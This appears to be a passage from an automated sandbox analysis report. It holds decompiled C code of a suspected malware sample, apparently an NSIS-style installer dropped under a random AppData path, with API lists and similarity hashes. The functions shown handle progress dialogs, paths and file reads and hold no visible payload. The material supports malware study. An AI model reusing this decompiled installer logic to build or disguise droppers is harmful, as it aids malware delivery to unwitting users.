              							_v48 = _t29 - _t38;
              							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
              							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
              						}
              						if(_t38 != 0) {
              							_t28 = _a4;
              							0x422728[_t28] = 0;
              							return _t28;
              						}
              					} else {
              						_t27 = lstrlenW(_a8) + _a4;
              						if(_t27 < 0x1000) {
              							_t27 = lstrcatW(0x422728, _a8);
              							goto L6;
              						}
              					}
              				}
              				return _t27;
              			}

              APIs
              • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
              • lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
              • lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
              • SetWindowTextW.USER32(00422728,00422728), ref: 00405611
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID: ('B
              • API String ID: 2531174081-2332581011
              • Opcode ID: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
              • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
              • Opcode Fuzzy Hash: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
              • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E004067EB(WCHAR* _a4) {
              				short _t5;
              				short _t7;
              				WCHAR* _t19;
              				WCHAR* _t20;
              				WCHAR* _t21;
              
              				_t20 = _a4;
              				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
              					_t20 =  &(_t20[4]);
              				}
              				if( *_t20 != 0 && E00405E88(_t20) != 0) {
              					_t20 =  &(_t20[2]);
              				}
              				_t5 =  *_t20;
              				_t21 = _t20;
              				_t19 = _t20;
              				if(_t5 != 0) {
              					do {
              						if(_t5 > 0x1f &&  *((short*)(E00405E3E(L"*?|<>/\":", _t5))) == 0) {
              							E00405FED(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
              							_t19 = CharNextW(_t19);
              						}
              						_t20 = CharNextW(_t20);
              						_t5 =  *_t20;
              					} while (_t5 != 0);
              				}
              				 *_t19 =  *_t19 & 0x00000000;
              				while(1) {
              					_push(_t19);
              					_push(_t21);
              					_t19 = CharPrevW();
              					_t7 =  *_t19;
              					if(_t7 != 0x20 && _t7 != 0x5c) {
              						break;
              					}
              					 *_t19 =  *_t19 & 0x00000000;
              					if(_t21 < _t19) {
              						continue;
              					}
              					break;
              				}
              				return _t7;
              			}

              APIs
              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
              • CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
              • CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
              Strings
              • *?|<>/":, xrefs: 0040683D
              • "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" , xrefs: 004067EB
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Char$Next$Prev
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-832777236
              • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
              • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
              • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
              • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004044F9(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
              				struct tagLOGBRUSH _v16;
              				long _t39;
              				long _t41;
              				void* _t44;
              				signed char _t50;
              				long* _t54;
              
              				if(_a4 + 0xfffffecd > 5) {
              					L18:
              					return 0;
              				}
              				_t54 = GetWindowLongW(_a12, 0xffffffeb);
              				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
              					goto L18;
              				} else {
              					_t50 = _t54[5];
              					if((_t50 & 0xffffffe0) != 0) {
              						goto L18;
              					}
              					_t39 =  *_t54;
              					if((_t50 & 0x00000002) != 0) {
              						_t39 = GetSysColor(_t39);
              					}
              					if((_t54[5] & 0x00000001) != 0) {
              						SetTextColor(_a8, _t39);
              					}
              					SetBkMode(_a8, _t54[4]);
              					_t41 = _t54[1];
              					_v16.lbColor = _t41;
              					if((_t54[5] & 0x00000008) != 0) {
              						_t41 = GetSysColor(_t41);
              						_v16.lbColor = _t41;
              					}
              					if((_t54[5] & 0x00000004) != 0) {
              						SetBkColor(_a8, _t41);
              					}
              					if((_t54[5] & 0x00000010) != 0) {
              						_v16.lbStyle = _t54[2];
              						_t44 = _t54[3];
              						if(_t44 != 0) {
              							DeleteObject(_t44);
              						}
              						_t54[3] = CreateBrushIndirect( &_v16);
              					}
              					return _t54[3];
              				}
              			}

              APIs
              • GetWindowLongW.USER32(?,000000EB), ref: 00404516
              • GetSysColor.USER32(00000000), ref: 00404554
              • SetTextColor.GDI32(?,00000000), ref: 00404560
              • SetBkMode.GDI32(?,?), ref: 0040456C
              • GetSysColor.USER32(?), ref: 0040457F
              • SetBkColor.GDI32(?,?), ref: 0040458F
              • DeleteObject.GDI32(?), ref: 004045A9
              • CreateBrushIndirect.GDI32(?), ref: 004045B3
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
              • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
              • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E004026E4(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
              				intOrPtr _t65;
              				intOrPtr _t66;
              				intOrPtr _t72;
              				void* _t76;
              				void* _t79;
              
              				_t72 = __edx;
              				 *((intOrPtr*)(_t76 - 8)) = __ebx;
              				_t65 = 2;
              				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
              				_t66 = E00402D1C(_t65);
              				_t79 = _t66 - 1;
              				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
              				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
              				if(_t79 < 0) {
              					L36:
              					 *0x42a308 =  *0x42a308 +  *(_t76 - 4);
              				} else {
              					__ecx = 0x3ff;
              					if(__eax > 0x3ff) {
              						 *(__ebp - 0x44) = 0x3ff;
              					}
              					if( *__edi == __bx) {
              						L34:
              						__ecx =  *(__ebp - 0xc);
              						__eax =  *(__ebp - 8);
              						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
              						if(_t79 == 0) {
              							 *(_t76 - 4) = 1;
              						}
              						goto L36;
              					} else {
              						 *(__ebp - 0x38) = __ebx;
              						 *(__ebp - 0x18) = E0040649C(__ecx, __edi);
              						if( *(__ebp - 0x44) > __ebx) {
              							do {
              								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
              									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406113( *(__ebp - 0x18), __ebx) >= 0) {
              										__eax = __ebp - 0x50;
              										if(E004060B5( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
              											goto L34;
              										} else {
              											goto L21;
              										}
              									} else {
              										goto L34;
              									}
              								} else {
              									__eax = __ebp - 0x40;
              									_push(__ebx);
              									_push(__ebp - 0x40);
              									__eax = 2;
              									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
              									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
              									if(__eax == 0) {
              										goto L34;
              									} else {
              										__ecx =  *(__ebp - 0x40);
              										if(__ecx == __ebx) {
              											goto L34;
              										} else {
              											__ax =  *(__ebp + 0xa) & 0x000000ff;
              											 *(__ebp - 0x4c) = __ecx;
              											 *(__ebp - 0x50) = __eax;
              											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
              												L28:
              												__ax & 0x0000ffff = E00406483( *(__ebp - 0xc), __ax & 0x0000ffff);
              											} else {
              												__ebp - 0x50 = __ebp + 0xa;
              												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
              													L21:
              													__eax =  *(__ebp - 0x50);
              												} else {
              													__edi =  *(__ebp - 0x4c);
              													__edi =  ~( *(__ebp - 0x4c));
              													while(1) {
              														_t22 = __ebp - 0x40;
              														 *_t22 =  *(__ebp - 0x40) - 1;
              														__eax = 0xfffd;
              														 *(__ebp - 0x50) = 0xfffd;
              														if( *_t22 == 0) {
              															goto L22;
              														}
              														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
              														__edi = __edi + 1;
              														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
              														__eax = __ebp + 0xa;
              														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
              															continue;
              														} else {
              															goto L21;
              														}
              														goto L22;
              													}
              												}
              												L22:
              												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
              													goto L28;
              												} else {
              													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
              														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
              															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
              															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
              														} else {
              															__ecx =  *(__ebp - 0xc);
              															__edx =  *(__ebp - 8);
              															 *(__ebp - 8) =  *(__ebp - 8) + 1;
              															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
              														}
              														goto L34;
              													} else {
              														__ecx =  *(__ebp - 0xc);
              														__edx =  *(__ebp - 8);
              														 *(__ebp - 8) =  *(__ebp - 8) + 1;
              														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
              														 *(__ebp - 0x38) = __eax;
              														if(__ax == __bx) {
              															goto L34;
              														} else {
              															goto L26;
              														}
              													}
              												}
              											}
              										}
              									}
              								}
              								goto L37;
              								L26:
              								__eax =  *(__ebp - 8);
              							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
              						}
              						goto L34;
              					}
              				}
              				L37:
              				return 0;
              			}









              APIs
              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: File$Pointer$ByteCharMultiWide$Read
              • String ID: 9
              • API String ID: 163830602-2366072709
              • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
              • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
              • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
              • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402FC6(intOrPtr _a4) {
              				short _v132;
              				long _t6;
              				struct HWND__* _t7;
              				struct HWND__* _t15;
              
              				if(_a4 != 0) {
              					_t15 =  *0x420efc; // 0x0
              					if(_t15 != 0) {
              						_t15 = DestroyWindow(_t15);
              					}
              					 *0x420efc = 0;
              					return _t15;
              				}
              				__eflags =  *0x420efc; // 0x0
              				if(__eflags != 0) {
              					return E0040696D(0);
              				}
              				_t6 = GetTickCount();
              				__eflags = _t6 -  *0x42a270;
              				if(_t6 >  *0x42a270) {
              					__eflags =  *0x42a268;
              					if( *0x42a268 == 0) {
              						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F2B, 0);
              						 *0x420efc = _t7;
              						return ShowWindow(_t7, 5);
              					}
              					__eflags =  *0x42a334 & 0x00000001;
              					if(( *0x42a334 & 0x00000001) != 0) {
              						wsprintfW( &_v132, L"... %d%%", E00402FAA());
              						return E004055A4(0,  &_v132);
              					}
              				}
              				return _t6;
              			}








              APIs
              • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
              • GetTickCount.KERNEL32 ref: 00402FFF
              • wsprintfW.USER32 ref: 0040302D
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              • CreateDialogParamW.USER32 ref: 00403051
              • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                • Part of subcall function 00402FAA: MulDiv.KERNEL32(0002F5B0,00000064,00031437), ref: 00402FBF
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
              • String ID: ... %d%%
              • API String ID: 722711167-2449383134
              • Opcode ID: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
              • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
              • Opcode Fuzzy Hash: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
              • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404E4D(struct HWND__* _a4, intOrPtr _a8) {
              				long _v8;
              				signed char _v12;
              				unsigned int _v16;
              				void* _v20;
              				intOrPtr _v24;
              				long _v56;
              				void* _v60;
              				long _t15;
              				unsigned int _t19;
              				signed int _t25;
              				struct HWND__* _t28;
              
              				_t28 = _a4;
              				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
              				if(_a8 == 0) {
              					L4:
              					_v56 = _t15;
              					_v60 = 4;
              					SendMessageW(_t28, 0x113e, 0,  &_v60);
              					return _v24;
              				}
              				_t19 = GetMessagePos();
              				_v16 = _t19 >> 0x10;
              				_v20 = _t19;
              				ScreenToClient(_t28,  &_v20);
              				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
              				if((_v12 & 0x00000066) != 0) {
              					_t15 = _v8;
              					goto L4;
              				}
              				return _t25 | 0xffffffff;
              			}















              APIs
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
              • GetMessagePos.USER32 ref: 00404E70
              • ScreenToClient.USER32 ref: 00404E8A
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402F2B(struct HWND__* _a4, intOrPtr _a8) {
              				short _v132;
              				void* _t11;
              				WCHAR* _t19;
              
              				if(_a8 == 0x110) {
              					SetTimer(_a4, 1, 0xfa, 0);
              					_a8 = 0x113;
              				}
              				if(_a8 == 0x113) {
              					_t11 = E00402FAA();
              					_t19 = L"unpacking data: %d%%";
              					if( *0x42a274 == 0) {
              						_t19 = L"verifying installer: %d%%";
              					}
              					wsprintfW( &_v132, _t19, _t11);
              					SetWindowTextW(_a4,  &_v132);
              					SetDlgItemTextW(_a4, 0x406,  &_v132);
              				}
              				return 0;
              			}







              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
              • wsprintfW.USER32 ref: 00402F7D
              • SetWindowTextW.USER32(?,?), ref: 00402F8D
              • SetDlgItemTextW.USER32 ref: 00402F9F
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: unpacking data: %d%%$verifying installer: %d%%
              • API String ID: 1451636040-1158693248
              • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
              • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
              • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
              • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E00402947(void* __ebx, void* __eflags) {
              				void* _t26;
              				long _t31;
              				void* _t45;
              				void* _t49;
              				void* _t51;
              				void* _t54;
              				void* _t55;
              				void* _t56;
              
              				_t45 = __ebx;
              				 *((intOrPtr*)(_t56 - 0x38)) = 0xfffffd66;
              				_t50 = E00402D3E(0xfffffff0);
              				 *(_t56 - 0x40) = _t23;
              				if(E00405E88(_t50) == 0) {
              					E00402D3E(0xffffffed);
              				}
              				E0040600D(_t50);
              				_t26 = E00406032(_t50, 0x40000000, 2);
              				 *(_t56 + 8) = _t26;
              				if(_t26 != 0xffffffff) {
              					_t31 =  *0x42a278;
              					 *(_t56 - 0x44) = _t31;
              					_t49 = GlobalAlloc(0x40, _t31);
              					if(_t49 != _t45) {
              						E00403590(_t45);
              						E0040357A(_t49,  *(_t56 - 0x44));
              						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x28));
              						 *(_t56 - 0x10) = _t54;
              						if(_t54 != _t45) {
              							E00403309(_t47,  *((intOrPtr*)(_t56 - 0x2c)), _t45, _t54,  *(_t56 - 0x28));
              							while( *_t54 != _t45) {
              								_t47 =  *_t54;
              								_t55 = _t54 + 8;
              								 *(_t56 - 0x3c) =  *_t54;
              								E00405FED( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
              								_t54 = _t55 +  *(_t56 - 0x3c);
              							}
              							GlobalFree( *(_t56 - 0x10));
              						}
              						E004060E4( *(_t56 + 8), _t49,  *(_t56 - 0x44));
              						GlobalFree(_t49);
              						 *((intOrPtr*)(_t56 - 0x38)) = E00403309(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
              					}
              					CloseHandle( *(_t56 + 8));
              				}
              				_t51 = 0xfffffff3;
              				if( *((intOrPtr*)(_t56 - 0x38)) < _t45) {
              					_t51 = 0xffffffef;
              					DeleteFileW( *(_t56 - 0x40));
              					 *((intOrPtr*)(_t56 - 4)) = 1;
              				}
              				_push(_t51);
              				E00401423();
              				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t56 - 4));
              				return 0;
              			}












              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
              • GlobalFree.KERNEL32 ref: 004029F0
              • GlobalFree.KERNEL32 ref: 00402A03
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Global$AllocFree$CloseDeleteFileHandle
              • String ID:
              • API String ID: 2667972263-0
              • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
              • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
              • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
              • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00404D3F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
              				char _v68;
              				char _v132;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t23;
              				signed int _t24;
              				void* _t31;
              				void* _t33;
              				void* _t34;
              				void* _t44;
              				signed int _t46;
              				signed int _t50;
              				signed int _t52;
              				signed int _t53;
              				signed int _t55;
              
              				_t23 = _a16;
              				_t53 = _a12;
              				_t44 = 0xffffffdc;
              				if(_t23 == 0) {
              					_push(0x14);
              					_pop(0);
              					_t24 = _t53;
              					if(_t53 < 0x100000) {
              						_push(0xa);
              						_pop(0);
              						_t44 = 0xffffffdd;
              					}
              					if(_t53 < 0x400) {
              						_t44 = 0xffffffde;
              					}
              					if(_t53 < 0xffff3333) {
              						_t52 = 0x14;
              						asm("cdq");
              						_t24 = 1 / _t52 + _t53;
              					}
              					_t25 = _t24 & 0x00ffffff;
              					_t55 = _t24 >> 0;
              					_t46 = 0xa;
              					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
              				} else {
              					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
              					_t50 = 0;
              				}
              				_t31 = E00406579(_t44, _t50, _t55,  &_v68, 0xffffffdf);
              				_t33 = E00406579(_t44, _t50, _t55,  &_v132, _t44);
              				_t34 = E00406579(_t44, _t50, 0x423748, 0x423748, _a8);
              				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
              				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
              			}




















              APIs
              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
              • wsprintfW.USER32 ref: 00404DE9
              • SetDlgItemTextW.USER32 ref: 00404DFC
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s$H7B
              • API String ID: 3540041739-107966168
              • Opcode ID: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
              • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
              • Opcode Fuzzy Hash: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
              • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 48%
              			E00402E41(void* __eflags, void* _a4, short* _a8, signed int _a12) {
              				void* _v8;
              				int _v12;
              				short _v536;
              				void* _t27;
              				signed int _t33;
              				intOrPtr* _t35;
              				signed int _t45;
              				signed int _t46;
              				signed int _t47;
              
              				_t46 = _a12;
              				_t47 = _t46 & 0x00000300;
              				_t45 = _t46 & 0x00000001;
              				_t27 = E004063A9(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
              				if(_t27 == 0) {
              					if((_a12 & 0x00000002) == 0) {
              						L3:
              						_push(0x105);
              						_push( &_v536);
